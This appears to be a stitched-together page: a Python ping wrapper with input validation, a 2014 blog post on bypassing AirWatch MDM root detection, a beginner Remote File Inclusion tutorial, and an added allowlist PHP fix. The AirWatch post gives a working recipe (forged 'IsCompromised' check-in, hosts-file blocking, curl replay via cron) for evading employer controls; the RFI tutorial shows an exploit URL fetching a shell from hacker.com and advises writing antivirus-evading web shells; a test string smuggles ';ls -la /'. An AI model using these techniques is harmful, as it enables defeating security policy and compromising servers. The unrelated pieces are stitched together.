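def build_ping_argv(target, count=1):
    """Build the ping command as an argv list, never as a shell string.
    The list is passed straight to the OS, so no shell interprets metacharacters;
    the validator additionally keeps a target from starting with '-', so it can
    never be parsed as an option. The count bound is an assumption for this example."""
    if not is_valid_target(target):
        raise ValueError("refusing target: %r" % (target,))
    count = int(count)
    if not 1 <= count <= 5:
        raise ValueError("count must be between 1 and 5")
    return ["ping", "-c", str(count), target]


def run_ping(target, count=1):
    """Run the validated command with a timeout and return its standard output."""
    argv = build_ping_argv(target, count)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return proc.stdout


if __name__ == "__main__":
    for candidate in ("google.com", "8.8.8.8", "-c 0 google.com;ls -la /"):
        print("%-30r valid=%s" % (candidate, is_valid_target(candidate)))
```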

Monday, 24 March 2014

Bypassing AirWatch Root Restriction

Mobile devices are becoming more common in corporate environments. As a result, mobile device management (MDM) solutions have cropped up so that employers can remotely manage and wipe devices if necessary, along with setting certain requirements that employees must comply with, such as setting a passcode, encrypting the device, and not jailbreaking or rooting the device. It’s certainly not a bad idea to enforce restrictions on devices that may contain sensitive information. However, bypassing some of the restrictions that an employer may put in place is not difficult. This is especially true if someone wants to keep their device rooted. There are many contenders in the sphere of MDM software. For this blog I will be looking at AirWatch for Android. The device I will be using is a rooted Nexus 4 running Android 4.2.2.
[Note Update at End of Post - 09.13.13]

Background

AirWatch is an MDM solution that provides employers with the ability to manage mobile devices and enforce policies. An agent is installed on the device and monitors whether the device is compliant or not for specific policies. If a device is found to be non-compliant, the agent phones home to a server, notifying the employer of a non-compliant device.

Here is the default web interface for an AirWatch enrolled device. As you can see, my Nexus 4 is enrolled, is encrypted, and requires a passcode. However, it is still not compliant because my device has been “compromised,” i.e. rooted by myself. A poor word choice in my opinion. The same can be seen on the AirWatch agent.


If we navigate to the compliance section, we can see why we are not compliant.

Again, the agent shows that we are encrypted, but our device is “compromised.”

Digging Deeper

At this point I want to know how AirWatch is detecting that my phone is rooted. I tried removing the su binary and any superuser applications, but that didn’t seem to work. As a rooted phone, we can certainly grab the apk of the agent and tear it apart. That only revealed obfuscated java classes that would take a while to decipher. Next, I tried running strace against the agent process to get an idea of the calls that it is making, hoping that there would be something there that reveals what it is doing to detect root. Again, there weren’t any answers that I could find.

I decided to shelve looking for how AirWatch was detecting root for another day and instead I started focusing on the HTTP request and responses that the agent was sending and receiving. I started burp and setup a proxy on my Nexus 4. There is a fair amount of traffic that goes between the AirWatch agent and the server it’s talking to. One request in particular caught my eye.

This is the AirWatchBeacon check-in request. I omitted some of the more sensitive information in the request. As you can see there is an “IsCompromised” field in the request that is set to true. So I changed that to false and sent the request off. After refreshing the web interface, my device is no longer compromised.

The agent also shows that my device is no longer compromised.

So now we know how the agent checks in to the server and reports whether or not your device is compromised. By changing a simple flag, we now control that. Furthermore, there doesn't seem to be any type of session information associated with the request. We can replay the same request hours, even days later, and the server will accept it. The only downside now is that the agent will periodically do a check-in request with the server and report that the device is compromised. It’s a hassle to send a non-compromised request every time we want to be compliant. The first step I took in resolving this issue was to look at the AirWatch configuration options in its SQLite database.

Using the SQLite Editor app from the Android market, I open up the AirWatch database with root access.

Selecting the AirWatch database reveals a number of interesting tables.

The profileGroupSetting table is where most of the AirWatch configurations are stored.

There are a few rows that look interesting. The ones that contain “interval” in the name seem to set how often the AirWatch requests are sent. I tried changing the BeaconInterval to large values to see if it would take longer for the check-in requests to be sent. That didn't seem to work. Neither did setting the value to zero or a negative value. For the most part, setting the interval values did not seem to do anything in my testing.

There is, however, another way to stop AirWatch from sending out requests: modifying the Android hosts file to block the host that the requests are being sent to. The Android hosts file is located in /system/etc/. Again, you have to be root to be able to modify the hosts file. I modified the hosts file to redirect the requested host to my localhost. The requested host is going to be different for every company, so I won’t be showing that. It’s been well over a week and my device has still not checked in and still shows that I’m compliant.

The only downside to not checking in often is that your device will show as not having been seen for some time. Your employer may have a policy in place to remove devices that AirWatch shows as being inactive. One way to mitigate this is to periodically send out the check-in request yourself. Simply setting up a cron job with curl to send out the check-in request works very well.
#!/bin/bash
 
curl -X POST -d @request https://host/DeviceServices/AirWatchBeacon.svc/checkin -H "Content-Type: application/json" -H "User-Agent: AirWatch Agent/4.0.401/Android/4.2.2" -H "Host: host"


Here is the JSON POST request data the curl command uses for -d @request:

{"payLoad":{"FriendlyName":"Android_sdNexus 4_353918050698915","Model":"Nexus 4","CustomerLocationGroupRef":"YourGroup","PhoneNumber":"1111111111","DeviceType":5,"C2dmToken":"APA91bHcoJnegJy23fPaa2Fg2miP0vJEuC9aVcAw9iuwKb8AQcnzr7OyiXShrJSGD_AajBPUwuSm4Y_gcuz3ibnnjfbfpkLnAnoF599IM2yZhTVaUq0XWLKFfNP11oYzIavq4OjTO5DH4y3XpkvWmQBD16qkFJEg1BFFuOA2y1SJo6aE2yILIIo","IsCompromised":"false","OsVersion":"4.2.2","SerialNumber":"1111111111","Name":"Google occam","MacAddress":"ff:ff:ff:ff:ff:ff","DeviceIdentifier":"11111111111111","AWVersion":"4.0.401","TransactionIdentifier":"a8098ea5-a54e-412f-a911-a58920a24dc7"}}

Finally, add the bash script to your crontab by running “crontab -e” to edit the crontab and add the following at the end of the file:

0 */2 * * * /root/command.sh

This will cause the script to run every two hours.

Conclusion
MDM solutions are great for employers to manage mobile devices. However, they are not without their problems. Not only was I able to bypass compliance for having a rooted device, but I was also able to bypass the requirement to encrypt my device by editing the profileGroupSetting table. Bypassing compliance restrictions for AirWatch is relatively trivial after a few hours and I’m sure it is probably similar with many other MDM solutions.

Thursday, 20 March 2014

RFI Full Tutorial For All New N00bs

Intro: What is RFI??



RFI means Remote File Inclusion.
RFI is a type of web application security hole.
On the net, there are many sites which are vulnerable to RFI.

In this tutorial, I am going to show you RFI with PHP.
PHP is a web scripting engine. It's the most widely used one, which is why I am using it in this tutorial.

Learn more about PHP: http://php.net

http://en.wikipedia.org/wiki/PHP


To understand what file inclusion is I am going to show a little example.
This is an example site in PHP:




PHP Code:
<?php $content = "Hello and welcome to the site"; ?>
<html><head><title>Hello world</title></head><body>
<?php echo($content); ?>
</body></html>


This is a very basic page. But as your page expands you might want to put the individual pages in their own files and include them in the main file depending on user input. This way, when you have pages with perhaps 10k lines of PHP code you don't have to spend hours looking for the bit of code you want to edit or view.

By user input I mean things like a URL GET argument. A GET argument could look like this:

www.site.com/index.php?page=index

In the above example the PHP script would see the “page=index” and then show the content of “index”. The “index” can be anything: a file, an SQL value, a hard-coded variable. If it is a file, then the PHP script is most likely using the include() function, and that is file inclusion.


1. Understanding RFI

So, in the above text I said that file inclusion is including files in another file. Well, that is all right but what does that actually mean?

Well, let's say we have two files:
index.php
content.php

index.php is the file people are going to view when they visit my page, www.site.com as usual. But we want index.php to display the contents of content.php without the user actually visiting content.php.

All you would need to do is put this PHP script in index.php:

PHP Code: <?php include("content.php"); ?>

Now we are showing the contents of content.php when the user visits index.php. If content.php was to include more PHP code it would also get executed.

That is it. We just did file inclusion! However, this example is just a dummy page and would most likely not be found in real life.


Let's create a new scenario, a more realistic one. We have the following files/pages:

index.php
1.php
2.php
3.php

Now, index.php is again the file the users are going to visit. On the default index we are going to display 3 links.

www.site.com/index.php?page=1
www.site.com/index.php?page=2
www.site.com/index.php?page=3

When the user clicks the first link it's going to show the contents of 1.php, when the user clicks the second link it's going to show the contents of 2.php, and when the user clicks the last link it's going to show the contents of 3.php.

The index.php script would in this case look something like this (note that I am now coding like an idiot to create security holes):

PHP Code:
<?php
if (isset($_GET['page'])) {
   include($_GET['page'] . ".php");
} else {
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>');
}
?>

The contents of 1, 2 and 3 are not important in this example so I won't say anything about that.

Now, when a user clicks the page1 link he or she is taken to www.site.com/index.php?page=1

The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL + “.php”. The same goes for 2 and 3.


Now, what is this “Remote” part in RFI all about? Well, this belongs more in the “exploiting RFI vulnerabilities” part of this tutorial, but I have to say something short about it now.

The above code is vulnerable to RFI. You can test this by visiting:
www.site.com/index.php?page=4

That would give us an error (assuming the server administrator has not turned off “show errors” in the PHP configuration). The error would look something like this:
Warning: include(page4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3
Warning: include() [function.include]: Failed opening 'page4.php' for inclusion (include_path='.;PATH') in PATH\index.php on line 3

This would tell us that the include() function used in this script is not secured and can be exploited. The way you exploit it is by getting it to include your code so that you can control the server. This is where the “remote” part of RFI comes in. You can create a PHP script and save it as .txt, upload it to a server and then visit something like this:

http://www.site.com/index.php?page=http://hacker.com/shell.txt?

Note that the ? is to get rid of the “.php” at the end, as we did not name the file .txt.php, and also if you were to include a .php file from a remote server it would only give the executed output of the PHP file.

Now we have successfully put our code in the PHP engine of the victim server and we are free to do whatever PHP can do, which is mostly anything.


2. Finding RFI vulnerabilities


As said above, to check for the most basic vulnerabilities all you need to do is manipulate the GET arguments and look for error messages like the one above. For more advanced ones you might need to try things out; this is called blind RFI. As you gain more knowledge about PHP and RFI you will understand how to perform blind RFIs.

Here are a few examples of manipulating GET arguments:

www.site.com/index.php?id=1
www.site.com/index.php?id=1asdfsaf
www.site.com/index.php?id=index
www.site.com/index.php?id=fuckkkk
www.site.com/index.php?id=lolzzzz


Use your imagination... And for those who did not understand: the argument does not need to be “id” or “page” or “site”. It can be anything.

There are more advanced versions of RFI like POST argument RFI and even cookie RFI and HTTP header RFI and so on. But these should be easy to understand once you gain more knowledge about the HTTP protocol, TCP/IP, HTTP servers, PHP etc.

3. Exploiting RFI vulnerabilities


Let's say that you have successfully found a vulnerable page.

The URL is www.site.com/index.php?page=index

The PHP script is made in such a way that we only need to edit page=index to page=http://hacker.com/shell.txt and we now have our PHP code over on the victim's server and it executes.

What you should do now is try to make something called a shell. A shell is essentially just a PHP script that can perform Explorer-like actions, like reading/writing/editing/creating files and navigating folders etc. Some shells even have built-in exploits to gain root access on the server, but that's another story.

Now, there is a truckload of premade shells out there but I really recommend creating your own as it is good learning, and most shells are actually detected by antiviruses, believe it or not. So if the server you are trying to access has an antivirus it will not work and it might spoil your attack.

4. Securing RFI vulnerabilities


Secure user inputs!!!! And not just those you THINK are used in SQL queries or include functions etc. ALL user inputs should be secured. You do this by stripping or disallowing words, phrases or symbols in the user inputs. The most common solution when it comes to RFI is just to make the page less dynamic and hardcode the pages. If you still want to have a dynamically editable page you MUST make sure you secure the user inputs. Check it for the word “http”, check it for the word “www.”, check it for “../”, check it for “?” etc. Disable “show PHP errors” in the PHP configuration. Do a file_exists() check. These are all easy things you can do to prevent RFI (and LFI, but that is again another story).

Here is an example of a dynamic page and a hardcoded page. The dynamic one is not secure, the hardcoded one is.

Dynamic:
PHP Code:
<?php
if (isset($_GET['page'])) {
   include($_GET['page'] . ".php");
} else {
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>');
}
?>

Hardcoded:
PHP Code:
<?php
if (isset($_GET['page']))
{
   if ($_GET['page'] == "page1")
      include("1.php");

   if ($_GET['page'] == "page2")
      include("2.php");

   if ($_GET['page'] == "page3")
      include("3.php");
}
else
{
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>');
}
?>
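As an added example that is not part of the tutorial, here is the same index.php written with a fixed allowlist map instead of word filtering, which is what the hardcoded version above does with a chain of ifs; the request value is only ever used as a key, so it never reaches include(). The pages/ directory and the php.ini settings named in the comments are assumptions.

```php
<?php
// Added example, not the tutorial's own code: an allowlist version of index.php.
// $_GET['page'] is only ever used as a key into a fixed map, so it never reaches
// include() and neither "http://..." nor "../" in the request has any effect.
declare(strict_types=1);

// Permitted page names and the files they map to (assumed to live in ./pages).
const PAGES = [
    'page1' => '1.php',
    'page2' => '2.php',
    'page3' => '3.php',
];
const PAGE_DIR = __DIR__ . '/pages';

// Returns the absolute path of the file for $name, or null if $name is not an
// exact allowlist key or the file does not resolve to a file inside PAGE_DIR.
function resolvePage(?string $name): ?string
{
    if ($name === null || !array_key_exists($name, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$name]);
    // realpath() returns false for a missing file (the file_exists() check the
    // tutorial suggests); the prefix test is defence in depth against a symlink
    // or a misconfigured map entry pointing outside the page directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Only accept a plain string; a request like page[]=x would arrive as an array.
$requested = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : null;
$path = resolvePage($requested);
if ($path !== null) {
    include $path;
} else {
    // Unknown or missing page: show the menu and never echo the raw request
    // value back, so a bad name is neither included nor reflected.
    foreach (array_keys(PAGES) as $key) {
        $safe = htmlspecialchars($key, ENT_QUOTES, 'UTF-8');
        echo "<p><a href=\"index.php?page=$safe\">$safe</a></p>";
    }
}
// Server side, also set allow_url_include=Off and display_errors=Off in php.ini,
// so remote URLs cannot be included at all and include() failures do not leak
// paths the way the warnings shown earlier do.
```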